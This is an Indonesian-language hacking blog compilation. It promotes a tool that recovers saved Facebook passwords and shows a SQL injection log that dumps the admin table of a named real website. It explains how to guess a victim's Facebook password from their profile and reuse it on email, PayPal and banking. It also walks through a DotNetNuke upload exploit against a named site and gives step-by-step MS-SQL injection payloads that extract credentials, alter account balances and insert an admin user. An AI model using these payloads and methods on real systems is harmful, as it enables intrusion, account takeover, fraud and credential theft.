Facebook Password Decryptor

FacebookPasswordDecryptor adalah perangkat lunak GRATIS untuk segera memulihkan password account yang disimpan Facebook disimpan oleh web browser populer dan rasul. Sebagian besar aplikasi penyimpanan password Login untuk mencegah hassale dari masukan password setiap pengguna.
Features of FacebookPasswordDecryptor
Facebook Password Decryptor men-support recpvery dari password account yang tersimpan Facebook dari sebagian besar browser internet yang populer. Berikut adalah daftar lengkap aplikasi yang didukung.

• Internet Explorer
• Firefox
• Google Chrome
• Opera Browser
• Apple Safari
• Flock Browser
• Paltalk Messenger
• Miranda Messenger

Installing FacebookPasswordDecryptor
Meskipun FacebookPasswordDecryptor adalah tools yang portable, tapi tools ini diharuskan untuk menginstall dengan Installer sehingga Anda dapat menginstalnya secara lokal pada sistem anda untuk penggunaan reguler. Agan” dapat menggunakan Uninstaller untuk menghapus perangkat lunak dari sistem.


Using FacebookPasswordDecryptor
Using GUI Version

• Jalankan Facebook Password Decryptor
• Kemudian klik “Start Recovery” , maka semua password login facebook dari berbagai aplikasi yang digunakan akan ter- recover dengan sendirinya (screen 1).
• Default password tidak ditampilkan untuk alasan keamanan karena data sensitif. Namun anda dapat mengklik tombol on’Show Password ‘di bagian bawah untuk melihat password tersebut.
• Setelah itu anda dapat menyimpan semua recovery password dalam kedalam format txt maupun Html dengan memilih “export to text” atau “export to Html”.

Using Command-line Version
FacebookPasswordDecryptor.exe  “<output_file path>”
Contoh nye:
//Writes recovered password to text file in current directory
FacebookPasswordDecryptor.exe  output.txt
//Writes recovered password to HTML file in current directory
FacebookPasswordDecryptor.exe  output.html
//Writes recovered password to TEXT file
FacebookPasswordDecryptor.exe  “c:\my test\passlist”
Secara otomatis mendeteksi mode (teks atau html) dengan menggunakan ekstensi dari file yang ditentukan (txt atau html). Default (atau jika tidak ada ekstensi yang ditentukan) menggunakan mode TEXT (screen 2).
Screenshot hasil recover password facebook oleh Facebook Password Decryptor:


Screenshot perintah dalam command line:


List export data dalam bentuk Html menggunakan Facebook Password Decrypter

Download : http://securityxploded.com/getfile_plus.php?id=2222

HACK BANK

Code:

|---------------------------------------------------------------| | rsauron[@]gmail[dot]com v5.0 | | 6/2008 schemafuzz.py | | -MySQL v5+ Information_schema Database Enumeration | | -MySQL v4+ Data Extractor | | -MySQL v4+ Table & Column Fuzzer | | Usage: schemafuzz.py [options] | | -h help darkc0de.com | |---------------------------------------------------------------| [+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17-- [+] Evasion Used: "+" "--" [+] 21:25:25 [+] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3,4, [+] Column Length is: 5 [+] Found null column at column #: 1 [+] SQLi URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,1,2,3,4-- [+] darkc0de URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4 [-] Done! |---------------------------------------------------------------| | rsauron[@]gmail[dot]com v5.0 | | 6/2008 schemafuzz.py | | -MySQL v5+ Information_schema Database Enumeration | | -MySQL v4+ Data Extractor | | -MySQL v4+ Table & Column Fuzzer | | Usage: schemafuzz.py [options] | | -h help darkc0de.com | |---------------------------------------------------------------| [+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4-- [+] Evasion Used: "+" "--" [+] 21:26:39 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: k9bloodbank_com User: hmziller@localhost Version: 4.0.27-log |---------------------------------------------------------------| | rsauron[@]gmail[dot]com v5.0 | | 6/2008 schemafuzz.py | | -MySQL v5+ Information_schema Database Enumeration | | -MySQL v4+ Data Extractor | | -MySQL v4+ Table & Column Fuzzer | | Usage: schemafuzz.py [options] | | -h help darkc0de.com | |---------------------------------------------------------------| [+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4-- [+] Evasion Used: "+" "--" [+] 21:27:12 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: k9bloodbank_com User: hmziller@localhost Version: 4.0.27-log [+] Number of tables names to be fuzzed: 338 [+] Number of column names to be fuzzed: 249 [+] Searching for tables and columns... [+] Found a table called: admin [+] Now searching for columns inside table "admin" [!] Found a column called:username [!] Found a column called:password [!] Found a column called:id |---------------------------------------------------------------| | rsauron[@]gmail[dot]com v5.0 | | 6/2008 schemafuzz.py | | -MySQL v5+ Information_schema Database Enumeration | | -MySQL v4+ Data Extractor | | -MySQL v4+ Table & Column Fuzzer | | Usage: schemafuzz.py [options] | | -h help darkc0de.com | |---------------------------------------------------------------| [+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4-- [+] Evasion Used: "+" "--" [+] 21:29:03 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: k9bloodbank_com User: hmziller@localhost Version: 4.0.27-log [+] Dumping data from database "k9bloodbank_com" Table "admin" [+] Column(s) ['username', 'password'] [+] Number of Rows: 1 [0] -=[CENCORED BY ME....!!!!!!]=- [-] [21:29:15] [-] Total URL Requests 3 [-] Done

loginnya di

	Code:
	http://www.k9bloodbank.com/admin

SORRY ADA YG ANE RALAT ( SEMBUNYIKAN KARENA INI MERUGIKAN ORANG LAIN )

Hack akun Facebook

 

 HACKER SEJATI TIDAK AKAN MENYALAHG GUNAKAN NYA

 

Bukan karena MEREKA hebat bisa membobol keamanan Facebook, tapi karena ANDA SENDIRI yang memberikan password kepada MEREKA!!

Cara Ini Adalah Cara MANUAL & CLASSIC, Cara Bisa Anda Pakai Jika Semua Cara Sudah Gagal!
Jika Anda Sudah Merasa Jago, Silakan Tinggalkan Halaman Ini!

Step One

Request jadi teman victim / target di facebook.

Step Two

Lihat profilenya. Catat tanggal lahir, nama istri, pacar, anak, adik kakak, dan tanggal lahir mereka. Semua hal yang ada di facebooknya, sedetail-detailnya!

Step Three

Logout.  Coba-coba kombinasi password dari data profile yang victim berikan. Jika berhasil, lanjut ke Step Four. Jika Gagal kembali ke Step One.

Step Four

Jika account facebook victim berhasil masuk, coba-coba ke account social network victim lainnya, termasuk email, control panel website, paypal,internet banking dan lain-lain, karena kemungkinan victim menggunakan password yang sama sangat besar.

Step Five

Bersihkan data profile facebook account Anda dari hal-hal yang nyaris bahkan sama dengan password yang sedang Anda gunakan jika tidak ingin hal yang sama menimpa Anda.

‘it’s imposible Hacking Web di Hp

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

5 Hacker TOP BLACK HACKER

5 orang dibawah ini merupakan top 5 black hat hacker ato lebih dikenal dengan hacker yang bandel, jail, dan nakal!! tapi jangan diraguin lagi kemampuan mereka!!
1.JONATHAN JAMES

Sapa siy niy ni orang…?okay, James adalah orang amerika, saat baru umur 16 taun dia dikirm ke penjara karena kelakuannya didunia maya cuy..situs departemen pertahanan Amerika dibobol ama si James dan dia cuma bilang itu tantangan bagi dia n merupakan datu kesenangan tersendiri..wah gila juga ni orang;;
NASA juga kena keisengan dia, James nyuri software NASA ang diperkirakan seharga $1.7 juta dollar AS. sampe2 NASA dipaksa untuk mematikan server dan sistemnya!!!
Karena kelakuannya juga doi gak boleh megang komputer selama 10 tahun..kasian nih orang..haha
tapi sekarang doi udah dijalan yang bener dan bikin sebuah perusahaan keamanan dibidang komputer..mantab!!
2. ADRIAN LAMO
Ni orang juga sarap. doi ngebobol New York Times buat nedapetin info personal dan beberapa security number n ngebobol Microsoft (busyet gak tanggung2 dah). doi akhirnya didenda $65.000 dollar US,
Saat ini doi jadi pembicara dibeberapa acara seminar!! bravo dach!!

3. KEVIN MITNICK

Kalo menurut gw inilah legenda hidup yang saat ini bener2 mantap dalam dunia hack.!!
Ni kelakuan doi:
* Menggunakan Los Angeles bus transfer system buat ngedapetin tumpangan gatis
* Mengelabui FBI
* Hacking kedalam DEC System(Digital Equipment Corporation)
* Ngedapetin administrator positon dalam satu komputer IBM biar menang judi, karena adminnya yang punya laptop IBM tersebut..haha
* Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems
Dan masih banyak lagi kelakuan doi yang luar biasa
Seorang white hat hacker pun yang bernama Tsutomu Shimomura pun (ahli juga doi dan merupakan top 5 white hat hacker<hacker bae bae>), di hack komputer systemnya, dan terjadilah perang luar biasa..
Doi ketangkep dan kelacak oleh FBI dengan bantuan Tsutomu Shimomura yang ngelacak (tracking) lewat jaringan HP’ yang dibawa ama Mitnick saat itu..
Tapi sekarang doi dah tobat n jadi seorang penulis buku, konsultan security, dan pembicara.
4. KEVIN POULSEN

Juga dikenal dengan Dark Dante, doi ngehack database FBI (galak niy orang)
Selain itu doi juga ngehack seluruh lines phone station. Karena emang kemahiran dia ngehack lewat phone lines.
Saat ini, dia jadi senior editor di Wired News, dan berhasil mengengkap 744 penawaran sex melalui profiles Myspace..!!
Sukses dach gan!!
5. ROBERT TAPPAN MORIS

Niy orang adalah orang yang pertama kali bikin Worm, yang dinamain Morris Worm (narsis niy orang)
Melalui internet doi nyebari wormnya yang mengakibatkan sekitar 6000 komputer jadi down..!!!
Dia akhirnya dipenjarakan rumah selama 3 tahun dan didenda sebesar $10.500 dollars
Sekarang doi kerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory!!
HACKER LEGENDARIS
Bernama KARL KOCH berasal dari hannover Jerman ang ngenamain komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer), doi melakukan beberapa keberhasilan dalam ngehack pada kurun waktu 1985-1988. doi juga seorang cocaine addict!!
dia berhasil membobol beberapa sistem militer AS dan ngehacked sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack’annya dijual ke KGB (Agen Rahasia Uni Soviet)
dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun siapa tau, ini konspirasi tingkat tinggi antara US dan Soviet pada perang dingin!!!
Mukanya ga ada yang serem yah..hehehehehe

Proses Hacker

Process Hacker adalah software dengan fitur yang dikemas untuk memanipulasi proses dan service pada komputer. Process Hacker merupakan opensource dan gratis yang digunakan untuk menampilkan proses yang ada dikomputer dan editor memori dengan fitur-fitur unik seperti penjelasan berikut:

Processes

• View processes in a tree view with highlighting
• View detailed process statistics and performance graphs
• Process tooltips are detailed and show context-specific information
• Select multiple processes and terminate, suspend or resume them
• (32-bit only) Bypass almost all forms of process protection
• Restart processes
• Empty the working set of processes
• Set affinity, priority and virtualization
• Create process dumps
• Use over a dozen methods to terminate processes
• Detach processes from debuggers
• View process heaps
• View GDI handles
• Inject DLLs
• View DEP status, and even enable/disable DEP
• View environment variables
• View and edit process security descriptors
• View image properties such as imports and exports

Threads

• View thread start addresses and stacks with symbols
• Threads are highlighted if suspended, or are GUI threads
• Select multiple threads and terminate, suspend or resume them
• Force terminate threads
• View TEB addresses and view TEB contents
• (32-bit only) Find out what a thread is doing, and what objects it is waiting on
• View and edit thread security descriptors

Tokens

• View full token details, including user, owner, primary group, session ID, elevation status, and more
• View token groups
• View privileges and even enable, disable or remove them
• View and edit token security descriptors

Modules

• View modules and mapped files in one list
• Unload DLLs
• View file properties and open them in Windows Explorer

Memory

• View a virtual memory list
• Read and modify memory using a hex editor
• Dump memory to a file
• Free or decommit memory
• Scan for strings

Handles

• View process handles, complete with highlighting for attributes
• Search for handles (and DLLs and mapped files)
• Close handles
• (32-bit only) Set handle attributes – Protected and Inherit
• Granted access of handles can be viewed symbolically instead of plain hex numbers
• View detailed object properties when supported
• View and edit object security descriptors

Services

• View a list of all services
• Create services
• Start, stop, pause, continue or delete services
• Edit service properties
• View service dependencies and dependents
• View and edit service security descriptors

Network

• View a list of network connections
• Close network connections
• Use tools such as whois, traceroute and ping

Download Process Hacker  Tools:

HACK situs WEB ( bebahaya )

Hay  hacker ikuti cara cara beikut ini 

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....